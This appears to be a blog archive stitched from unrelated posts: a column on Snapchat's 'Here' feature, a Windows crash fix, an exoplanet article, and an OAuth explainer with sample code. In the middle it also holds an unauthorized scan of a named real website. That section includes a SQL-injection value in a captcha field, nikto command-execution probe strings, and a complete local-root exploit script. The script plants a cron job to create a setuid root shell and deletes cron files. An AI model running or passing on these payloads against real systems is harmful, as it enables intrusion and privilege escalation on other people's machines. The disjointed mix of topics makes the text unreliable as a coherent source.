Snapchat’s latest feature shows why IT must tame marketing’s inner monster

By Evan Schuman, Computerworld

Marketing has gone gaga over social media. (Come to think of it, gaga may be marketing’s default state.) Marketers being who they are, they are trying to figure out ways to use social media to control consumers and bend them to their will. As they seek to do that, they will look to IT to make their visions reality. It’s up to the adults in IT to inject some rationality into those discussions.

What brings this to mind is an interesting and deliriously over-the-top feature announced by Snapchat on May 1 and called simply Here. The intent of the program is innocuous enough. It’s supposed to allow people to pop up on your mobile screen without the phone ringing and — here’s the tricky part — without you agreeing to it. If you have ever seen marketers in action, you can probably see why I think this will appeal to them.

The video that Snapchat made shows how the program would work when everything goes perfectly. And it indeed looks like an attractive feature if you buy into Snapchat’s assumptions about how people should interact. As a Business Insider piece described it: “It’s all part of Snapchat’s strategy called ‘Here,’ which strives to make all users feel like their friends are constantly present and attentive.”

The catch is that friends — especially the rather all-encompassing definition of friends adopted by users of Snapchat and other social media — are in fact not constantly present and attentive. What better way to drive that point home than to force people to make a binary choice: interact with me now or not at all?

Snapchat differentiated its original photo-messaging service with its Mission: Impossible twist: photos and videos vanished 10 seconds after they were viewed by the recipient. The Here feature introduces social risks, though. With the original service, you sent an image, and if it was ignored, no one was insulted. But the more personal and real-time the conversation attempt, the more insulting it will feel when it’s ignored or rejected. Bizarrely enough, this is why email is arguably the most polite of communication methods. You can send an email whenever it suits you, and it quietly and politely waits until the recipient has the time to deal with it. With Here, you show up on the recipient’s screen instantly, and the recipient is either going to start to talk to you right then or just swipe you away into non-existence. Ouch!

Here’s the IT headache. This is going to plant ideas into the heads of your marketing counterparts. “Gee, I’d love to be able to pop up on the screens of our customers whenever I want. Make that happen, IT. Of course you can do it. Snapchat’s already done it.” (As a grown-up, you will want to resist the urge to respond, “And if Facebook jumped off the Empire State Building . . . ?”)

Most people have a bit of niceness and politeness inside of them. It’s socialized into us as we learn to avoid being rejected a lot. Marketers, though, seem to have no fear of rejection. Only they could routinely send out hundreds of thousands of emails and be thrilled with a 1% response rate. The prospect of being turned down again and again via an instant video-communication app is not going to faze them.

This is why, when I heard about Here, I thought about how dangerous it could be in the hands of the marketing department. People who have no compunction about telephoning millions of people during the dinner hour are not going to resist a technology that will let them instantly show up on the phones of customers, even though those customers might get annoyed if they are driving, going to the bathroom or just watching TV. If their conscience won’t stop them, you need to. Sorry, but there’s a price for having grown up.

Evan Schuman has covered IT issues for a lot longer than he’ll ever admit. The founding editor of retail technology site StorefrontBacktalk, he’s been a columnist for CBSNews.com, RetailWeek and eWeek. Evan can be reached at eschuman@thecontentfirm.com and he can be followed at twitter.com/eschuman. Look for his column every Tuesday.


Originally published on Computerworld.

Posted: May 14, 2014 in Vulnerabilities

If you experience a problem with Windows Explorer crashing (restarting) and “checking for solutions” frequently, check your event log (Start menu – Control Panel\All Control Panel Items\Administrative Tools\Event Viewer) for the details of the fault:

Error 1000

Faulting application name: explorer.exe, version: 6.1.7601.17567, time stamp: 0x4d6727a7
Faulting module name: DivXMFSource.dll, version: 1.0.0.72, time stamp: 0x4cffcf66
Exception code: 0xc0000005
Fault offset: 0x0009b8a1
Faulting process id: 0x1120
Faulting application start time: 0x01cde647c43c2960
Faulting application path: C:\Windows\explorer.exe
Faulting module path: C:\Program Files\DivX\DivX Plus Media Foundation Components\DivXMFSource.dll
Report Id: 05f99130-523b-11e2-ab4f-000000540400

Temporary solution – uninstall DivX

As you can see, the problem is easily rectified, but only if you know what you’re doing. The conflicting DLL or other file could be malware, or it could belong to a bigger program.

P.S. This error had to be posted here because the Microsoft site has changed to only promote bug reports on software that is being evaluated :)
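An added triage helper (not from the original post) for exactly this situation: it parses Event ID 1000 records as copied from Event Viewer, counts crashes per faulting module so the recurring culprit stands out, decodes the exception code, and flags a module that was loaded into explorer.exe from outside the Windows directory. The two sample records are constructed from the event quoted above, and the NTSTATUS table is deliberately small.

```python
import re
from collections import Counter

# Constructed sample: two Application Error (Event ID 1000) records as copied
# from Event Viewer's text view; the first is the one quoted in the post.
SAMPLE_LOG = """\
Faulting application name: explorer.exe, version: 6.1.7601.17567, time stamp: 0x4d6727a7
Faulting module name: DivXMFSource.dll, version: 1.0.0.72, time stamp: 0x4cffcf66
Exception code: 0xc0000005
Faulting process id: 0x1120
Faulting application path: C:\\Windows\\explorer.exe
Faulting module path: C:\\Program Files\\DivX\\DivX Plus Media Foundation Components\\DivXMFSource.dll
Report Id: 05f99130-523b-11e2-ab4f-000000540400

Faulting application name: explorer.exe, version: 6.1.7601.17567, time stamp: 0x4d6727a7
Faulting module name: DivXMFSource.dll, version: 1.0.0.72, time stamp: 0x4cffcf66
Exception code: 0xc0000005
Faulting process id: 0x0a3c
Faulting application path: C:\\Windows\\explorer.exe
Faulting module path: C:\\Program Files\\DivX\\DivX Plus Media Foundation Components\\DivXMFSource.dll
Report Id: 7b2d1c40-523c-11e2-ab4f-000000540400
"""

# A few NTSTATUS values that commonly appear as "Exception code" in Event 1000.
NTSTATUS = {
    0xC0000005: "STATUS_ACCESS_VIOLATION",
    0xC0000409: "STATUS_STACK_BUFFER_OVERRUN",
    0xC00000FD: "STATUS_STACK_OVERFLOW",
}

def parse_records(text):
    """Split blank-line separated records into dicts of lower-cased field -> value."""
    records = []
    for chunk in re.split(r"\n\s*\n", text.strip()):
        rec = {}
        for line in chunk.splitlines():
            key, _, value = line.partition(":")  # only the first colon ends the field name
            rec[key.strip().lower()] = value.strip()
        if "faulting module path" in rec:
            records.append(rec)
    return records

def triage(text):
    """Name the module the crashes keep landing in, decode the exception codes and
    flag a module loaded from outside the Windows directory (third-party, or worse)."""
    recs = parse_records(text)
    culprit, count = Counter(r["faulting module path"] for r in recs).most_common(1)[0]
    codes = {NTSTATUS.get(int(r["exception code"], 16), r["exception code"]) for r in recs}
    return {
        "module": culprit,
        "crashes": count,
        "exceptions": sorted(codes),
        "third_party": not culprit.lower().startswith("c:\\windows\\"),
    }
```

Once the module is named, check its publisher signature and the install location before deciding between "uninstall the product" and "this is malware".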

Info first

root@bt:/pentest/enumeration/web/whatweb# ./whatweb ncc.c
http://ncc.co.uk [200] Cookies[ncc], Email[info@ncc.co.uk], Google-Analytics[UA-11579552-1], Title[National Computing Centre  | Home], PHP[5.2.17], JQuery, X-Powered-By[PHP/5.2.17], Country[UNITED KINGDOM][GB], Apache, HTTPServer[Apache], IP[88.98.24.202]

The index.php response header contains an Expires date that is long gone:

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.17
Transfer-Encoding: chunked
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Tue, 11 Sep 2012 03:02:58 GMT
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="content-language" content="en" />
<script type="text/javascript"> var url_address = "http://ncc.co.uk/"; </script>

Blind SQLi in captcha!

During a few scans with BackTrack, here’s a vulnerability I found on their site. This first one sits on http://ncc.co.uk/index.php/index.php in the captcha token:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
    <html>
    <head>
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
        <title>Exported HTTP Request from W3AF</title>
    </head>
    <body><form action="http://ncc.co.uk/index.php" method="POST">
<label>website</label>
<input type="text" name="website" value="http://w3af.sf.net/">
<label>comment</label>
<input type="text" name="comment" value="Hi hunny I’m home">
<label>firstname</label>
<input type="text" name="firstname" value="John">
<label>lastname</label>
<input type="text" name="lastname" value="Smith">
<label>company</label>
<input type="text" name="company" value="Bonsai">
<label>telephone</label>
<input type="text" name="telephone" value="55550178">
<label>captcha</label>
<input type="text" name="captcha" value="84" OR "84"="84">
<label>postcode</label>
<input type="text" name="postcode" value="55550178">
<label>address</label>
<input type="text" name="address" value="Bonsai Street 123">
<label>Accreditation_4_action</label>
<input type="text" name="Accreditation_4_action" value="submit">
<label>form</label>
<input type="text" name="form" value="4">
<label>title</label>
<input type="text" name="title" value="">
<label>jobtitle</label>
<input type="text" name="jobtitle" value="Hunter">
<label>email</label>
<input type="text" name="email" value="w3af@techsupportbase.net">
<label>mode</label>
<input type="text" name="mode" value="56">
<label>captcha_token</label>
<input type="text" name="captcha_token" value="4e49734857717649364c72367738453d">
<label>page</label>
<input type="text" name="page" value="689">
<input type="submit">
</form>
</body>
</html>

19 items found, suspected vulnerabilities:

root@bt:/pentest/web/nikto# ./nikto.pl -h http://ncc.co.uk
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          88.98.24.202
+ Target Hostname:    ncc.co.uk
+ Target Port:        80
+ Start Time:         2012-09-10 21:17:29 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache
+ Retrieved x-powered-by header: PHP/5.2.17
+ robots.txt contains 2 entries which should be manually viewed.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-17664: /_mem_bin/remind.asp: Page will give the password reminder for any user requested (username must be known).
+ OSVDB-724: /cgi-bin/ans.pl?p=../../../../../usr/bin/id|&blah: Avenger’s News System allows commands to be issued remotely.
+ OSVDB-724: /cgi-bin/ans/ans.pl?p=../../../../../usr/bin/id|&blah: Avenger’s News System allows commands to be issued remotely.
+ OSVDB-3233: /mailman/listinfo: Mailman was found on the server.
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /certificates: This might be interesting…
+ OSVDB-3092: /img-sys/: Default image directory should not allow directory listing.
+ OSVDB-3092: /java-sys/: Default Java directory should not allow directory listing.
+ OSVDB-3299: /forumscalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20”;%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
+ OSVDB-3299: /forumzcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20”;%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
+ OSVDB-3299: /htforumcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20”;%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
+ OSVDB-3299: /vbcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20”;%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
+ OSVDB-3299: /vbulletincalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20”;%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
+ OSVDB-3299: /cgi-bin/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20”;%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
+ OSVDB-724: /ans.pl?p=../../../../../usr/bin/id|&blah: Avenger’s News System allows commands to be issued remotely.  http://ans.gq.nu/ default admin string ‘admin:aaLR8vE.jjhss:root@127.0.0.1′, password file location ‘ans_data/ans.passwd’
+ OSVDB-724: /ans/ans.pl?p=../../../../../usr/bin/id|&blah: Avenger’s News System allows commands to be issued remotely.
+ 6474 items checked: 64 error(s) and 19 item(s) reported on remote host
+ End Time:           2012-09-10 22:14:47 (GMT-4) (3438 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


# Date: 6/26/12
# Version: 3.x.x
# Category:: Local Root Exploit
# Tested on: Linux, Ubuntu
# Demo site: [3 vulnerable site, this will speed up check]

#!/bin/sh
#
# 3.x.x local root exp By: Blade
# + effected systems 3.x.x
# tested on Intel(R) Xeon(TM) CPU 5.20GHz
# Works perfect on all linux distros and servers.
# maybe others …
# ~
# Use this at your own risk, I’m not responsible for any risk.
# sorchfox@hotmail.com

cat > /tmp/getsuid.c << __EOF__
#include
#include
#include
#include
#include
#include
#include
#include

char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root chown root.root /tmp/s ; chmod 4777 /tmp/s ; rm -f /etc/cron.d/core\n";

int main() {
int child;
struct rlimit corelimit;
corelimit.rlim_cur = RLIM_INFINITY;
corelimit.rlim_max = RLIM_INFINITY;
setrlimit(RLIMIT_CORE, &corelimit);
if ( !( child = fork() )) {
chdir("/etc/cron.d");
prctl(PR_SET_DUMPABLE, 2);
sleep(200);
exit(1);
}
kill(child, SIGSEGV);
sleep(120);
}
__EOF__

cat > /tmp/s.c << __EOF__
#include
main(void)
{
setgid(0);
setuid(0);
system("/bin/sh");
system("rm -rf /tmp/s");
system("rm -rf /etc/cron.d/*");
return 0;
}
__EOF__
echo "wait approx 4 min to get sh"
cd /tmp
cc -o s s.c
cc -o getsuid getsuid.c
./getsuid
./s
rm -rf getsuid*
rm -rf s.c
rm -rf prctl.sh

This might be even better than Kepler-22b! An alien exoplanet has been discovered that resembles our own Earth more closely than any found before. It is the best bet scientists are putting forward for a planet outside our own Solar System that is capable of harbouring liquid water. It lies in just the right zone – called the Goldilocks Zone – at the perfect distance from its parent star, and might even be congenial enough to harbour life of the form we see on Earth. It is also our next-door neighbour, just 22 light years away. The planet is christened GJ 667C.

An artist’s impression

Just to give you a sense of how close GJ 667C is, consider that there are only 100 stars closer to Earth than this planet. The planet sits bang in the middle of the Goldilocks zone, as Steven Vogt, astronomer at the University of California, Santa Cruz, emphatically stresses in an interview with space.com:

It’s right smack in the habitable zone – there is no question or discussion about it. It’s not on the edge, it’s right in there!

The planet is about 4.5 times the size of Earth, but it is not gaseous. It is rocky, with a composition similar to that of Earth. It orbits its parent star in only 28 days. The parent star is one member of a triple-star system, which by itself is a nice fact about this planetary system. The star is a faint M-star, but still visible from Earth. The faintness of the star explains how the planet can be quite close to it – as indicated by its small orbital period – while still being in the Goldilocks zone, which is in itself a first. It shows that systems otherwise deemed boring might be worth checking.

The sight of the sky from GJ 667C should be great! Its parent star is one of a triple-star system, which means that apart from its own sun, the planet’s sky has two more suns, which are just far enough away not to destabilize the orbit or burn up the planet. Vogt does the explaining again:

The planet is around one star in a triple-star system. The other stars are pretty far away, but they would look pretty nice in the sky.

The study was published in Astrophysical Journal Letters.

How To Build A Dinosaur

Posted: February 5, 2012 in Documentaries

Watch the doc here…

How to build a dino

http://feeds.topdocumentaryfilms.com/~r/TopDocumentaryFilms/~3/7h6_ivXsoJY/

2-legged vs. 3-legged OAuth

Posted: January 12, 2012 in Uncategorized

From emails I receive it seems like there is a bit of confusion about what the terms 2-legged OAuth and 3-legged OAuth mean. I hope I can clear up this confusion with this article (and not contribute more to the confusion…).

In short, they describe two different usage scenarios of OAuth involving two respectively three parties.

3-legged OAuth describes the scenario for which OAuth was originally developed: a resource owner wants to give a client access to a server without sharing his credentials (i.e. username/password). A typical example is a user (resource owner) who wants to give a third-party application (client) access to his Twitter account (server).

On a conceptual level it works in the following way:

1. The client has signed up with the server and obtained its client credentials (also known as “consumer key and secret”) ahead of time.
2. The user wants to give the client access to his protected resources on the server.
3. The client retrieves temporary credentials (also known as a “request token”) from the server.
4. The client redirects the resource owner to the server.
5. The resource owner grants the client access to his protected resources on the server.
6. The server redirects the user back to the client.
7. The client uses the temporary credentials to retrieve the token credentials (also known as the “access token”) from the server.
8. The client uses the token credentials to access the protected resources on the server.

2-legged OAuth, on the other hand, describes a typical client-server scenario without any user involvement. An example of such a scenario could be a local Twitter client application accessing your Twitter account.

On a conceptual level, 2-legged OAuth simply consists of the first and last steps of 3-legged OAuth:

1. The client has signed up with the server and obtained its client credentials (also known as “consumer key and secret”).
2. The client uses its client credentials (and empty token credentials) to access the protected resources on the server.

Above I used Twitter as an example, though strictly speaking they don’t use 2-legged OAuth but a variant of it: they provide not only the client credentials but also the token credentials (see also “Using one access token with OAuth”).

As you have seen, 2-legged OAuth is nothing new; it is simply OAuth used in a different scenario than the one it was designed for. Hence you can use (almost?) all existing OAuth libraries for 2-legged OAuth, too.
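As an added example that is not part of the original article, here is the RFC 5849 HMAC-SHA1 signing that both scenarios share. The only difference between the legs is what goes into the signing key: 2-legged requests carry no oauth_token and sign with an empty token secret, 3-legged requests add the access token and its secret. It goes slightly beyond the text by including the server-side verification with a constant-time compare; all hostnames, keys and secrets used with it are constructed.

```python
import base64, hashlib, hmac, secrets, time
from urllib.parse import parse_qsl, quote, urlsplit

def pct(s):
    """RFC 5849 section 3.6 encoding: only ALPHA, DIGIT, '-', '.', '_', '~' stay bare."""
    return quote(str(s), safe="-._~")

def base_string_uri(url):
    """Lower-case scheme and host, drop a default port, drop query and fragment."""
    u = urlsplit(url)
    scheme, host, port = u.scheme.lower(), (u.hostname or "").lower(), u.port
    if port and (scheme, port) not in (("http", 80), ("https", 443)):
        host = f"{host}:{port}"
    return f"{scheme}://{host}{u.path}"

def signature_base_string(method, url, params):
    """params: every (name, value) pair from the query string, the form body and
    the oauth_* protocol parameters, except oauth_signature itself."""
    encoded = sorted((pct(k), pct(v)) for k, v in params)  # by name, then by value
    normalized = "&".join(f"{k}={v}" for k, v in encoded)
    return "&".join([method.upper(), pct(base_string_uri(url)), pct(normalized)])

def sign(method, url, params, client_secret, token_secret=""):
    """Both legs use the key shape '<client_secret>&<token_secret>': 2-legged leaves
    token_secret empty, 3-legged fills in the access token secret."""
    key = f"{pct(client_secret)}&{pct(token_secret)}".encode()
    mac = hmac.new(key, signature_base_string(method, url, params).encode(), hashlib.sha1)
    return base64.b64encode(mac.digest()).decode()

def verify(method, url, params, presented_sig, client_secret, token_secret=""):
    """Server side: recompute from the stored secrets and compare in constant time."""
    expected = sign(method, url, params, client_secret, token_secret)
    return hmac.compare_digest(expected, presented_sig)

def oauth_params(client_key, token=None, nonce=None, timestamp=None):
    """Protocol parameters; oauth_token is present only in the 3-legged case."""
    p = [("oauth_consumer_key", client_key), ("oauth_signature_method", "HMAC-SHA1"),
         ("oauth_timestamp", str(timestamp or int(time.time()))),
         ("oauth_nonce", nonce or secrets.token_hex(8))]
    if token is not None:
        p.append(("oauth_token", token))
    return p

def request_params(url, body=""):
    """Query-string and form-body pairs; blank values are still part of the signature."""
    return (parse_qsl(urlsplit(url).query, keep_blank_values=True)
            + parse_qsl(body, keep_blank_values=True))
```

Fed the request from RFC 5849 section 3.4.1.1, signature_base_string() reproduces the base string printed there, which is the quickest way to check a home-grown signer against a library.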